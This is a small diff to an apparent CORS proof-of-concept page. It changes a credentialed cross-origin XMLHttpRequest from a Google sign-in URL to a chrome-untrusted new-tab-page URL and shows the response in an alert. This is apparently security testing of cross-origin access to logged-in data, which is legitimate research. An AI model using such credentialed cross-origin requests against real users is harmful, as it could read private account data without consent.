--- a/CORS.html
+++ b/CORS.html
@@ -8,7 +8,7 @@
                         document.getElementById("emo").innerHTML = alert(this.responseText);
             }
          };
-         xhttp.open("GET", "https://accounts.google.com/AccountChooser/signinchooser?continue=https://lh3.google.com/u/0/d/1-TTCS6fS6kvFUkoJmX4Udr-czQ79lSUVXiWsiAED_bs=w200-h150-p-k-nu&flowEntry=AccountChooser&flowName=GlifWebSignIn&hl=id&ltmpl=youtube&service=youtube&authuser=0", true);
+         xhttp.open("GET", "chrome-untrusted://new-tab-page/one-google-bar?paramsencoded=testtest", true);
          xhttp.withCredentials = true;
          xhttp.send();
          }
